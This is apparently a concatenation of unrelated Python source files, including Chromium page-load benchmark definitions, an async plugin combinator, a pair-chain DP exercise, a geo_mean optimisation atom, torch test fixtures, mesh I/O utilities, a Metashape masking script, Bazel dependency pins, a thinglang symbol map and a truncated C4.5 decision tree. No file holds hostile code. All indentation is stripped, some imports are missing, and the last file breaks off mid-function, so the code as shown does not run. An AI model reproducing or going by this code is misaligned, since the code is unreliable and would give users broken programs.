from benchmarks import loading_metrics_category
from telemetry import benchmark
from telemetry.page import cache_temperature
from telemetry.web_perf import timeline_based_measurement
class _PageCyclerV2(perf_benchmark.PerfBenchmark):
options = {'pageset_repeat': 2}
def CreateCoreTimelineBasedMeasurementOptions(self):
tbm_options = timeline_based_measurement.Options()
loading_metrics_category.AugmentOptionsForLoadingMetrics(tbm_options)
return tbm_options
@classmethod
def ShouldDisable(cls, possible_browser):
# crbug.com/619254
if possible_browser.browser_type == 'reference':
return True
# crbug.com/616781
if (cls.IsSvelte(possible_browser) or
possible_browser.platform.GetDeviceTypeName() == 'Nexus 5X' or
possible_browser.platform.GetDeviceTypeName() == 'AOSP on BullHead'):
return True
return False
@benchmark.Disabled('win10')
@benchmark.Disabled('android') # crbug.com/654217
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2Typical25(_PageCyclerV2):
"""Page load time benchmark for a 25 typical web pages.
Designed to represent typical, not highly optimized or highly popular web
sites. Runs against pages recorded in June, 2014.
"""
@classmethod
def Name(cls):
return 'page_cycler_v2.typical_25'
def CreateStorySet(self, options):
return page_sets.Typical25PageSet(run_no_page_interactions=True,
cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.Typical25StoryExpectations()
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlArFaHe(_PageCyclerV2):
"""Page load time for a variety of pages in Arabic, Farsi and Hebrew.
Runs against pages recorded in April, 2013.
"""
page_set = page_sets.IntlArFaHePageSet
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_ar_fa_he'
def CreateStorySet(self, options):
return page_sets.IntlArFaHePageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlArFaHeStoryExpectations()
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlEsFrPtBr(_PageCyclerV2):
"""Page load time for a pages in Spanish, French and Brazilian Portuguese.
Runs against pages recorded in April, 2013.
"""
page_set = page_sets.IntlEsFrPtBrPageSet
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_es_fr_pt-BR'
def CreateStorySet(self, options):
return page_sets.IntlEsFrPtBrPageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlEsFrPtBrStoryExpectations()
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlHiRu(_PageCyclerV2):
"""Page load time benchmark for a variety of pages in Hindi and Russian.
Runs against pages recorded in April, 2013.
"""
page_set = page_sets.IntlHiRuPageSet
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_hi_ru'
def CreateStorySet(self, options):
return page_sets.IntlHiRuPageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlHiRuStoryExpectations()
@benchmark.Disabled('android') # crbug.com/666898
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlJaZh(_PageCyclerV2):
"""Page load time benchmark for a variety of pages in Japanese and Chinese.
Runs against pages recorded in April, 2013.
"""
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_ja_zh'
def CreateStorySet(self, options):
return page_sets.IntlJaZhPageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlJaZhStoryExpectations()
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2IntlKoThVi(_PageCyclerV2):
"""Page load time for a variety of pages in Korean, Thai and Vietnamese.
Runs against pages recorded in April, 2013.
"""
page_set = page_sets.IntlKoThViPageSet
@classmethod
def Name(cls):
return 'page_cycler_v2.intl_ko_th_vi'
def CreateStorySet(self, options):
return page_sets.IntlKoThViPageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.IntlKoThViStoryExpectations()
@benchmark.Enabled('android')
@benchmark.Owner(emails=['[email protected]', '[email protected]'])
class PageCyclerV2Top10Mobile(_PageCyclerV2):
"""Page load time benchmark for the top 10 mobile web pages.
Runs against pages recorded in November, 2013.
"""
@classmethod
def Name(cls):
return 'page_cycler_v2.top_10_mobile'
def CreateStorySet(self, options):
return page_sets.Top10MobilePageSet(cache_temperatures=[
cache_temperature.PCV1_COLD, cache_temperature.PCV1_WARM])
def GetExpectations(self):
return page_sets.Top10MobileStoryExpectations()
|
python
|
from typing import List
from machine.params import Parameters
from machine.plugin import Plugin
from machine.connection import Connection
from machine.plugin import PluginGenerator, PluginResult
class Sequence(Plugin):
def __init__(self, plugins: List[PluginGenerator]):
assert len(plugins) > 0, "Sequence cannot be empty!"
self._plugins = plugins
async def __call__(
self, conn: Connection, params: Parameters
) -> PluginResult:
applied_plugins: List[PluginResult] = []
try:
for plugin_gen in self._plugins:
plugin = plugin_gen()(conn, params)
conn, params = await plugin.__anext__()
applied_plugins.append(plugin)
yield conn, params
for plugin in reversed(applied_plugins):
try:
await plugin.__anext__()
except StopAsyncIteration:
continue
return
except Exception as exception:
error = exception
while len(applied_plugins) > 0:
try:
plugin = applied_plugins.pop(-1)
await plugin.athrow(error)
break
except Exception as e:
error = e
def sequence(plugins: List[PluginGenerator]) -> PluginGenerator:
return lambda: Sequence(plugins)
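# Hypothetical composition sketch (the plugin names below are placeholders, not part
# of the machine package): sequence() builds a single plugin that enters its children
# in order and unwinds them in reverse, as implemented by Sequence above.
#
# pipeline = sequence([auth_plugin, logging_plugin, router_plugin])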
|
python
|
# You are given N pairs of numbers.
# In every pair, the first number is always smaller than the second number.
# A pair (c, d) can follow another pair (a, b) if b < c.
# Chain of pairs can be formed in this fashion.
# You have to find the longest chain which can be formed from the given set of pairs.
dp = [[0] * 100 for _ in range(100)]  # independent rows; [[0]*100]*100 would alias one row
def maxchain(Parr, n, prev, pos):
if pos >= n:
return 0
if dp[pos][prev]:
return dp[pos][prev]
if Parr[pos][0] < prev:
return maxchain(Parr, n, prev, pos+1)
else:
ans = max(maxchain(Parr, n, Parr[pos][1],
0)+1, maxchain(Parr, n, prev, pos+1))
dp[pos][prev] = ans
return ans
print(maxchain([[1, 2], [2, 3], [3, 4]], 3, 0, 0))
def findLongestChain(pairs):
pairs.sort()
dp = [1] * len(pairs)
for j in range(len(pairs)):
for i in range(j):
if pairs[i][1] < pairs[j][0]:
dp[j] = max(dp[j], dp[i] + 1)
return max(dp)
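# Sanity check for the bottom-up version (verified by hand): (2, 3) cannot follow
# (1, 2) because 2 < 2 is false, but (3, 4) can, so the longest chain has length 2.
print(findLongestChain([[1, 2], [2, 3], [3, 4]]))  # expected output: 2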
|
python
|
""" This is the geo_mean atom.
geo_mean(x,y) = sqrt(x * y)
If either x or y is a vector, the atom is applied elementwise.
    It is a CONCAVE atom. It is INCREASING in the first argument, and
    INCREASING in the second argument.
    It returns a SCALAR expression if both arguments are SCALAR.
    Otherwise, it returns a VECTOR expression (sized to match the largest
    argument).
In every module, you must have defined two functions:
attributes :: [arg] -> (sign, vexity, shape)
rewrite :: [arg] -> Program
"""
import atom
from utils import *
class QC_geo_mean(atom.Atom):
def __init__(self, x, y):
super(QC_geo_mean, self).__init__(x,y)
def _monotonicity(self):
return [monotonicity.increasing, monotonicity.increasing]
def _curvature(self):
return curvature.Concave()
def _sign(self):
return sign.Positive()
def _shape(self):
return self.args[0].shape + self.args[1].shape
def _canonicalize(self):
v = Variable('', self.shape)
x, y = self.args
constraints = [
SOCProd(x + y, [y - x, Number(2.0)*v]),
y >= Number(0),
x >= Number(0)
]
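        # Assuming SOCProd(t, [u1, u2]) encodes the cone ||(u1, u2)||_2 <= t, the first
        # constraint gives (y - x)^2 + 4*v^2 <= (x + y)^2, i.e. v^2 <= x*y, so v <= sqrt(x*y)
        # for x, y >= 0 -- the hypograph form of geo_mean.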
return (v, constraints)
# register with the atom library
atom.atoms['geo_mean'] = QC_geo_mean
|
python
|
import torch
__TESTS__ = { }
def get_tests():
for k, v in __TESTS__.items():
yield k, v
def register(test):
name = getattr(test, "__name__", test.__class__.__name__)
if name in __TESTS__:
raise RuntimeError(f'Encountered a test name collision "{name}"')
__TESTS__[name] = test
return test
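# Hypothetical consumption sketch (not part of the original file): every registered
# test chunks a (1, 8, 2) tensor along dim=-2, so it yields a pair of (1, 4, 2) tensors.
#
# for name, case in get_tests():
#     left, right = case()
#     assert left.shape == (1, 4, 2) and right.shape == (1, 4, 2)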
@register
def test1():
unaligned = torch.Tensor([
[-0.9743, -0.2491],
[-0.5582, -0.1589],
[-0.2159, -0.1677],
[ 0.1593, -0.3002],
[-0.9743, 0.2714],
[-0.5582, 0.1491],
[-0.2159, 0.1377],
[ 0.1593, 0.2662]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test2():
unaligned = torch.Tensor([
[-0.9791, -0.3541],
[-0.5517, -0.1809],
[-0.2686, -0.1822],
[ 0.2237, -0.4052],
[-0.9791, 0.2998],
[-0.5517, 0.1574],
[-0.2686, 0.1590],
[ 0.2237, 0.3572]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test3():
unaligned = torch.Tensor([
[-0.9882, -0.0736],
[-0.7437, -0.0662],
[-0.2522, -0.0995],
[ 0.2172, -0.1664],
[-0.9882, 0.2589],
[-0.7437, 0.1070],
[-0.2522, 0.1835],
[ 0.2172, 0.2766]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test4():
unaligned = torch.Tensor([
[-0.9846, -0.5418],
[ 0.0205, -0.2194],
[ 0.2252, -0.2062],
[ 0.5488, -0.2653],
[-0.9846, 0.4780],
[ 0.0205, 0.2186],
[ 0.2252, 0.1963],
[ 0.5488, 0.1743]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test5():
unaligned = torch.Tensor([
[-0.9825, -0.1939],
[-0.7482, -0.1596],
[-0.1407, -0.2930],
[ 0.2218, -0.4294],
[-0.9825, 0.1199],
[-0.7482, 0.1063],
[-0.1407, 0.1077],
[ 0.2218, 0.1338]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test6():
unaligned = torch.Tensor([
[-0.9225, -0.2832],
[-0.7755, -0.2755],
[-0.1321, -0.4738],
[ 0.2905, -0.6044],
[-0.9225, 0.2201],
[-0.7755, 0.2172],
[-0.1321, 0.4091],
[ 0.2905, 0.5314]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test7():
unaligned = torch.Tensor([
[-0.9369, -0.4814],
[-0.4945, -0.1954],
[-0.3008, -0.2248],
[ 0.2783, -0.4565],
[-0.9369, 0.4577],
[-0.4945, 0.1532],
[-0.3008, 0.1621],
[ 0.2783, 0.3577]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
|
python
|
from os import path
from glob import glob
from cStringIO import StringIO
import numpy as np
import h5py
from scipy.sparse.csgraph import connected_components
from scipy.sparse import csr_matrix
from util import sort_nicely, veclen, filter_reindex
def convert_sequence_to_hdf5(filename_pattern, loader_function, hdf_output_file):
verts_all = []
tris = None
files = glob(path.expanduser(filename_pattern))
sort_nicely(files)
for i, f in enumerate(files):
print "loading file %d/%d [%s]" % (i+1, len(files), f)
verts, new_tris = loader_function(f)
        if tris is not None and (new_tris.shape != tris.shape or not np.array_equal(new_tris, tris)):
            raise ValueError("inconsistent topology between meshes of different frames")
tris = new_tris
verts_all.append(verts)
verts_all = np.array(verts_all, np.float32)
verts_all, tris, _, verts_mean, verts_scale = preprocess_mesh_animation(verts_all, tris)
with h5py.File(hdf_output_file, 'w') as f:
f.create_dataset('verts', data=verts_all, compression='gzip')
f['tris'] = tris
f.attrs['mean'] = verts_mean
f.attrs['scale'] = verts_scale
print "saved as %s" % hdf_output_file
def preprocess_mesh_animation(verts, tris):
"""
Preprocess the mesh animation:
- removes zero-area triangles
- keep only the biggest connected component in the mesh
- normalize animation into -0.5 ... 0.5 cube
"""
print "Vertices: ", verts.shape
print "Triangles: ", verts.shape
assert verts.ndim == 3
assert tris.ndim == 2
# check for zero-area triangles and filter
e1 = verts[0, tris[:,1]] - verts[0, tris[:,0]]
e2 = verts[0, tris[:,2]] - verts[0, tris[:,0]]
n = np.cross(e1, e2)
tris = tris[veclen(n) > 1.e-8]
# remove unconnected vertices
ij = np.r_[np.c_[tris[:,0], tris[:,1]],
np.c_[tris[:,0], tris[:,2]],
np.c_[tris[:,1], tris[:,2]]]
G = csr_matrix((np.ones(len(ij)), ij.T), shape=(verts.shape[1], verts.shape[1]))
n_components, labels = connected_components(G, directed=False)
if n_components > 1:
size_components = np.bincount(labels)
if len(size_components) > 1:
print "[warning] found %d connected components in the mesh, keeping only the biggest one" % n_components
print "component sizes: "
print size_components
keep_vert = labels == size_components.argmax()
else:
keep_vert = np.ones(verts.shape[1], np.bool)
verts = verts[:, keep_vert, :]
tris = filter_reindex(keep_vert, tris[keep_vert[tris].all(axis=1)])
# normalize triangles to -0.5...0.5 cube
verts_mean = verts.mean(axis=0).mean(axis=0)
verts -= verts_mean
verts_scale = np.abs(verts.ptp(axis=1)).max()
verts /= verts_scale
print "after preprocessing:"
print "Vertices: ", verts.shape
print "Triangles: ", verts.shape
return verts, tris, ~keep_vert, verts_mean, verts_scale
def load_ply(filename):
try:
from enthought.tvtk.api import tvtk
except ImportError:
try:
from tvtk.api import tvtk
except ImportError:
print "Reading PLY files requires TVTK. The easiest way is to install mayavi2"
print "(e.g. on Ubuntu: apt-get install mayavi2)"
raise
reader = tvtk.PLYReader(file_name=filename)
reader.update()
polys = reader.output.polys.to_array().reshape((-1, 4))
assert np.all(polys[:,0] == 3)
return reader.output.points.to_array(), polys[:,1:]
def load_off(filename, no_colors=False):
lines = open(filename).readlines()
lines = [line for line in lines if line.strip() != '' and line[0] != '#']
assert lines[0].strip() in ['OFF', 'COFF'], 'OFF header missing'
has_colors = lines[0].strip() == 'COFF'
n_verts, n_faces, _ = map(int, lines[1].split())
vertex_data = np.loadtxt(
StringIO(''.join(lines[2:2 + n_verts])),
dtype=np.float)
if n_faces > 0:
faces = np.loadtxt(StringIO(''.join(lines[2+n_verts:])), dtype=np.int)[:,1:]
else:
faces = None
if has_colors:
colors = vertex_data[:,3:].astype(np.uint8)
vertex_data = vertex_data[:,:3]
else:
colors = None
if no_colors:
return vertex_data, faces
else:
return vertex_data, colors, faces
def save_off(filename, vertices=None, faces=None):
if vertices is None:
vertices = []
if faces is None:
faces = []
with open(filename, 'w') as f:
f.write("OFF\n%d %d 0\n" % (len(vertices), len(faces)))
        if len(vertices) > 0:
np.savetxt(f, vertices, fmt="%f %f %f")
        if len(faces) > 0:
for face in faces:
fmt = " ".join(["%d"] * (len(face) + 1)) + "\n"
f.write(fmt % ((len(face),) + tuple(map(int, face))))
def load_splocs(component_hdf5_file):
with h5py.File(component_hdf5_file, 'r') as f:
tris = f['tris'].value
Xmean = f['default'].value
names = sorted(list(set(f.keys()) - set(['tris', 'default'])))
components = np.array([
f[name].value - Xmean
for name in names])
return Xmean, tris, components, names
|
python
|
# This script created by Joseph Aaron Campbell - 10/2020
# this script references https://www.agisoft.com/forum/index.php?topic=10564.msg47949#msg47949
# Use this as a learning tool only.
# I am not responsible for any damage to data or hardware if the script is not properly utilized.
# Following Code tested and based on Metashape Pro 1.6.2 using Windows 10 Pro
""" With Help from:
https://www.agisoft.com/forum/index.php?topic=12027.msg53791#msg53791
"""
"""
# # # # # # # # # # # # # # #
SET UP THE WORKING ENVIRONMENT
# # # # # # # # # # # # # # #
"""
import Metashape
"""create a reference to the current project"""
doc = Metashape.app.document
# create reference for list of chunks in project
chunkList = Metashape.app.document.chunks
# set reference to the currently selected chunk -- this should be the duplicated chunk from part-01
activeChunk = Metashape.app.document.chunk
# must include this line between each attempt to build a model, or it overwrites the last created model
activeChunk.model = None
# using optimized sparse cloud, create lower resolution model
activeChunk.buildModel\
(
surface_type=Metashape.Arbitrary,
interpolation=Metashape.EnabledInterpolation,
face_count=Metashape.FaceCount.LowFaceCount,
face_count_custom=200000,
source_data=Metashape.PointCloudData,
vertex_colors=True,
vertex_confidence=True,
volumetric_masks=False,
keep_depth=True,
trimming_radius=10,
subdivide_task=True,
workitem_size_cameras=20,
max_workgroup_size=100
)
# import masks function using lower resolution model as source for all cameras in chunk
activeChunk.importMasks\
(
path='{filename}_mask.png',
source=Metashape.MaskSourceModel,
operation=Metashape.MaskOperationReplacement,
tolerance=10
)
# get the current Chunks label ( name )
currentChunkLabel = activeChunk.label
# get the current (saved) project's parent folder URL via python3 pathLib
# this path variable is used when exporting the 3D model later in the script.
# 'parent' will return the parent folder the project lives in
# 'name' will return the saved project name and extension
# 'stem' will return just the project name without extension
from pathlib import Path
parentFolderPath = str(Path(Metashape.app.document.path).parent)
print("parent Folder is : " + parentFolderPath)
# set reference to the output folders as string
outputFolder = Path(str(parentFolderPath) + "\\" + "_Output")
outputChunkFolder = Path(str(outputFolder) + "\\" + "_" + str(currentChunkLabel))
outputMaskfolder = Path(str(outputChunkFolder) + "\\" + "_Masks")
print("output folder: " + str(outputFolder))
print("output chunk folder: " + str(outputChunkFolder))
print("model output folder is: " + str(outputMaskfolder))
# create an 'output' sub-folder for exported data from project
# also create sub-folder for model export within 'output' sub-folder
# this method will create the folder if it doesn't exist, and do nothing if it does exist
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
# export masks to output mask folder
# this uses the Metashape Task class, otherwise loop through every camera in chunk and save mask as image file
# create a reference to the Tasks ExportMasks method
mask_task = Metashape.Tasks.ExportMasks()
# define which cameras to export masks for
mask_task.cameras = activeChunk.cameras
# define the output path for the exported mask files
mask_task.path = str(str(outputMaskfolder) + "\\" + "{filename}.png")
# activate the task for the active chunk to export the masks
mask_task.apply(object=activeChunk)
# delete lower resolution model
activeChunk.remove(activeChunk.models[0])
# save document
doc.save()
|
python
|
load("//tools/bzl:maven_jar.bzl", "maven_jar")
AWS_SDK_VER = "2.16.19"
AWS_KINESIS_VER = "2.3.4"
JACKSON_VER = "2.10.4"
def external_plugin_deps():
maven_jar(
name = "junit-platform",
artifact = "org.junit.platform:junit-platform-commons:1.4.0",
sha1 = "34d9983705c953b97abb01e1cd04647f47272fe5",
)
maven_jar(
name = "amazon-kinesis-client",
artifact = "software.amazon.kinesis:amazon-kinesis-client:" + AWS_KINESIS_VER,
sha1 = "6bb6fcbc5a0f6fd6085f3b1589e738485b0b7867",
)
maven_jar(
name = "amazon-kinesis",
artifact = "software.amazon.awssdk:kinesis:" + AWS_SDK_VER,
sha1 = "bec13fc5ef9225d1a10f13fbe1de8cb114448cf8",
)
maven_jar(
name = "amazon-dynamodb",
artifact = "software.amazon.awssdk:dynamodb:" + AWS_SDK_VER,
sha1 = "33ec7d291973658779b5777db2a0214a5c469e81",
)
maven_jar(
name = "amazon-cloudwatch",
artifact = "software.amazon.awssdk:cloudwatch:" + AWS_SDK_VER,
sha1 = "7585fbe349a92e0a9f040e4194ac89ca32e7983d",
)
maven_jar(
name = "amazon-regions",
artifact = "software.amazon.awssdk:regions:" + AWS_SDK_VER,
sha1 = "089f4f3d3ef20b2486f09e71da638c03100eab64",
)
maven_jar(
name = "amazon-netty-nio-client",
artifact = "software.amazon.awssdk:netty-nio-client:" + AWS_SDK_VER,
sha1 = "bb674feda8417513a647c7aa8cba9a537068d099",
)
maven_jar(
name = "amazon-utils",
artifact = "software.amazon.awssdk:utils:" + AWS_SDK_VER,
sha1 = "53edaa1f884682ac3091293eff3eb024ed0e36bb",
)
maven_jar(
name = "amazon-sdk-core",
artifact = "software.amazon.awssdk:sdk-core:" + AWS_SDK_VER,
sha1 = "02a60fd9c138048272ef8b6c80ae67491dd386a9",
)
maven_jar(
name = "amazon-aws-core",
artifact = "software.amazon.awssdk:aws-core:" + AWS_SDK_VER,
sha1 = "0f50f5cf2698a0de7d2d77322cbf3fb13f76187f",
)
maven_jar(
name = "amazon-http-client-spi",
artifact = "software.amazon.awssdk:http-client-spi:" + AWS_SDK_VER,
sha1 = "e4027e7e0cb064602100b34e19f131983f76f872",
)
maven_jar(
name = "amazon-auth",
artifact = "software.amazon.awssdk:auth:" + AWS_SDK_VER,
sha1 = "4163754b2a0eadcb569a35f0666fd5d859e43ef8",
)
maven_jar(
name = "reactive-streams",
artifact = "org.reactivestreams:reactive-streams:1.0.2",
sha1 = "323964c36556eb0e6209f65c1cef72b53b461ab8",
)
maven_jar(
name = "reactor-core",
artifact = "io.projectreactor:reactor-core:3.4.3",
sha1 = "df23dbdf95f892f7a04292d040fd8b308bd66602",
)
maven_jar(
name = "rxjava",
artifact = "io.reactivex.rxjava2:rxjava:2.1.14",
sha1 = "20dbf7496e417da474eda12717bf4653dbbd5a6b",
)
maven_jar(
name = "jackson-databind",
artifact = "com.fasterxml.jackson.core:jackson-databind:" + JACKSON_VER,
sha1 = "76e9152e93d4cf052f93a64596f633ba5b1c8ed9",
)
maven_jar(
name = "jackson-dataformat-cbor",
artifact = "com.fasterxml.jackson.dataformat:jackson-dataformat-cbor:" + JACKSON_VER,
sha1 = "c854bb2d46138198cb5d4aae86ef6c04b8bc1e70",
)
maven_jar(
name = "events-broker",
artifact = "com.gerritforge:events-broker:3.5.0-alpha-202108041529",
sha1 = "309fe8cc08c46593d9990d4e5c448cc85e5a62b0",
)
maven_jar(
name = "io-netty-all",
artifact = "io.netty:netty-all:4.1.51.Final",
sha1 = "5e5f741acc4c211ac4572c31c7e5277ec465e4e4",
)
maven_jar(
name = "awssdk-query-protocol",
artifact = "software.amazon.awssdk:aws-query-protocol:" + AWS_SDK_VER,
sha1 = "4c88c66daa5039813e879b324636d15fa2802787",
)
maven_jar(
name = "awssdk-protocol-core",
artifact = "software.amazon.awssdk:protocol-core:" + AWS_SDK_VER,
sha1 = "6200c1617f87eed0216c6afab35bab2403da140c",
)
maven_jar(
name = "awssdk-json-protocol",
artifact = "software.amazon.awssdk:aws-json-protocol:" + AWS_SDK_VER,
sha1 = "16449e555f61607b917dc7f242c1928298de9bdd",
)
maven_jar(
name = "awssdk-cbor-protocol",
artifact = "software.amazon.awssdk:aws-cbor-protocol:" + AWS_SDK_VER,
sha1 = "7353a868437576b9e4911779ae66a85ef6be0d9e",
)
maven_jar(
name = "awssdk-metrics-spi",
artifact = "software.amazon.awssdk:metrics-spi:" + AWS_SDK_VER,
sha1 = "d8669974b412766751b5eaf9c1edad908bfe5c38",
)
maven_jar(
name = "amazon-profiles",
artifact = "software.amazon.awssdk:profiles:" + AWS_SDK_VER,
sha1 = "5add2a843de43bd0acf45e1ab8c2b94c3638dd66",
)
maven_jar(
name = "apache-commons-lang3",
artifact = "org.apache.commons:commons-lang3:3.12.0",
sha1 = "c6842c86792ff03b9f1d1fe2aab8dc23aa6c6f0e",
)
maven_jar(
name = "testcontainer-localstack",
artifact = "org.testcontainers:localstack:1.15.2",
sha1 = "ae3c4717bc5f37410abbb490cb46d349a77990a0",
)
maven_jar(
name = "aws-java-sdk-core",
artifact = "com.amazonaws:aws-java-sdk-core:1.11.960",
sha1 = "18b6b2a5cb83a0e2e33a593302b5dbe0ca2ade64",
)
maven_jar(
name = "awssdk-url-connection-client",
artifact = "software.amazon.awssdk:url-connection-client:" + AWS_SDK_VER,
sha1 = "b84ac8bae45841bc65af3c4f55164d9a3399b653",
)
maven_jar(
name = "awssdk-kinesis-producer",
artifact = "com.amazonaws:amazon-kinesis-producer:0.14.6",
sha1 = "7f83582df816dccc5217f05ece309a5cd8c7a9a5",
)
maven_jar(
name = "aws-glue-schema-serde",
artifact = "software.amazon.glue:schema-registry-serde:1.0.0",
sha1 = "30815b670f89876465caa69b47e6df6fd6875d0f",
)
maven_jar(
name = "apache-commons-io",
artifact = "commons-io:commons-io:2.4",
sha1 = "b1b6ea3b7e4aa4f492509a4952029cd8e48019ad",
)
maven_jar(
name = "javax-xml-bind",
artifact = "javax.xml.bind:jaxb-api:2.3.1",
sha1 = "8531ad5ac454cc2deb9d4d32c40c4d7451939b5d",
)
|
python
|
import collections
from typing import List
from thinglang.lexer.values.identifier import Identifier, GenericIdentifier
from thinglang.symbols.merged_symbol import MergedSymbol
from thinglang.symbols.symbol import Symbol
from thinglang.utils import collection_utils
class SymbolMap(object):
"""
Describes a symbol map - the public fields (members and methods) of a ThingDefinition.
Each SymbolMap also has an index number, by which it is known to the runtime.
"""
def __init__(self, members: List[Symbol], methods: List[Symbol], name: Identifier, extends: Identifier, generics: List[Identifier], convention, member_offset: int=0, method_offset: int=0):
self.members, self.methods, self.name, self.extends, self.generics, self.convention, self.member_offset, self.method_offset = \
members, self.merge_method_symbols(methods), name, extends, generics or [], convention, member_offset, method_offset
self.lookup = {
symbol.name: symbol for symbol in self.members + self.methods
}
assert len(self.methods) + len(self.members) == len(self.lookup), 'Thing definition contains colliding elements'
assert {x.convention for x in self.lookup.values()} == {self.convention}, 'Inconsistent calling conventions identified'
def serialize(self) -> dict:
"""
Serialize this symbol map (and its symbols) into a dict
"""
return {
"name": self.name,
"extends": self.extends,
"generics": self.generics,
"offsets": {
"members": self.member_offset,
"methods": self.method_offset
},
"convention": Symbol.serialize_convention(self.convention),
"symbols": collection_utils.flatten([x.serialize() for x in self.lookup.values()])
}
@classmethod
def from_serialized(cls, data: dict) -> 'SymbolMap':
"""
Reads a serialized symbol map and returns a new SymbolMap object.
Additionally, deserializes its symbols into Symbol objects
"""
symbols = [Symbol.load(elem) for elem in data['symbols']]
members = [symbol for symbol in symbols if symbol.kind == Symbol.MEMBER]
methods = [symbol for symbol in symbols if symbol.kind == Symbol.METHOD]
extends = Symbol.load_identifier(data['extends']) if data['extends'] else None
return cls(members=members,
methods=methods,
name=Identifier(data['name']),
extends=extends,
generics=[Identifier(x) for x in data['generics']],
convention=Symbol.serialize_convention(data['convention']),
member_offset=data['offsets']['members'],
method_offset=data['offsets']['methods'])
@classmethod
def from_thing(cls, thing, extends: 'SymbolMap') -> 'SymbolMap':
"""
Creates a new Symbol map from a ThingDefinition
        :param thing: the source ThingDefinition
        :param extends: optionally, the symbol map from which this thing inherits
"""
member_offset, method_offset = 0, 0
if extends is not None:
member_offset, method_offset = len(extends.members) + extends.member_offset, len(extends.methods) + extends.method_offset
members = [elem.symbol().update_index(member_offset + index) for index, elem in enumerate(thing.members)]
methods = [elem.symbol().update_index(method_offset + index) for index, elem in enumerate(thing.methods)]
return cls(members,
methods,
thing.name,
thing.extends,
thing.generics,
Symbol.BYTECODE,
member_offset=member_offset,
method_offset=method_offset)
def parameterize(self, parameters: dict) -> 'SymbolMap':
"""
Creates a new SymbolMap, replacing the generic parameters in this SymbolMap with determined values
:param parameters: a mapping of generic name -> resolved name
"""
assert set(parameters.keys()) == set(self.generics), 'Partial parameterization is not allowed'
return SymbolMap(
[x.parameterize(parameters) for x in self.members],
[x.parameterize(parameters) for x in self.methods],
GenericIdentifier(self.name, tuple([parameters[x] for x in self.generics])),
self.extends,
[],
self.convention,
self.member_offset,
self.method_offset)
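        # Illustrative example (names are hypothetical, not from the thinglang sources):
        # a SymbolMap whose generics are [Identifier('T')], parameterized with
        # {Identifier('T'): Identifier('number')}, yields a map named
        # GenericIdentifier(name, (Identifier('number'),)) whose symbols have every T
        # replaced by number.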
def __getitem__(self, item: Identifier) -> Symbol:
"""
Returns a symbol from this map
"""
return self.lookup[item]
def __contains__(self, item: Identifier) -> bool:
"""
Checks if a symbol identified by `item` exists
"""
return item in self.lookup
def __iter__(self):
"""
Iterates over all the fields of this symbol map
"""
return iter(self.lookup.values())
def __repr__(self):
return f'SymbolMap({self.name})'
@staticmethod
@collection_utils.drain()
def merge_method_symbols(methods):
method_symbols = collections.defaultdict(list)
for method_symbol in methods:
method_symbols[method_symbol.name].append(method_symbol)
for symbol_name, symbols in method_symbols.items():
yield symbols.pop() if len(symbols) == 1 else MergedSymbol(symbols)
|
python
|
# encoding:utf-8
from numpy import *
import math
import copy
import pickle
class C4_5DTree(object):
    def __init__(self):  # constructor
        self.tree = {}  # the generated decision tree
        self.dataSet = []  # data set
        self.labels = []  # feature labels
def loadDataSet(self, path, labels, split):
recordlist = []
with open(path, "r") as in_file:
for line in in_file:
recordlist.append(line.strip().split(split))
self.dataSet = recordlist
self.labels = labels
def train(self):
labels = copy.deepcopy(self.labels)
self.tree = self.buildTree(self.dataSet, labels)
def buildTree(self, dataSet, labels):
cateList = [data[-1] for data in dataSet]
if cateList.count(cateList[0]) == len(cateList):
return cateList[0]
if len(dataSet[0]) == 1:
return self.maxCate(cateList)
bestFeat, featValueList = self.getBestFeat(dataSet)
bestFeatLabel = labels[bestFeat]
tree = {bestFeatLabel: {}}
del (labels[bestFeat])
for value in featValueList:
subLabels = labels[:]
splitDataSet = self.splitDataSet(dataSet, bestFeat, value)
subTree = self.buildTree(splitDataSet, subLabels)
tree[bestFeatLabel][value] = subTree
return tree
    # return the category label that occurs most often
def maxCate(self, catelist):
items = dict([(catelist.count(i), i) for i in catelist])
return items[max(items.keys())]
    # compute the information entropy of the data set
    def computeEntropy(self, dataSet):  # Shannon entropy
        datalen = float(len(dataSet))
        cateList = [data[-1] for data in dataSet]  # category labels from the data set
        # dict keyed by category, with its occurrence count as the value
        items = dict([(i, cateList.count(i)) for i in cateList])
infoEntropy = 0.0
for key in items:
prob = float(items[key]) / datalen
infoEntropy -= prob * math.log(prob, 2)
return infoEntropy
    # split the data set: keep rows whose value on the feature axis equals `value`,
    # drop that feature column, and return the remaining data
    # dataSet: data set; axis: feature axis; value: value taken on the feature axis
def splitDataSet(self, dataSet, axis, value):
rtnList = []
for featVec in dataSet:
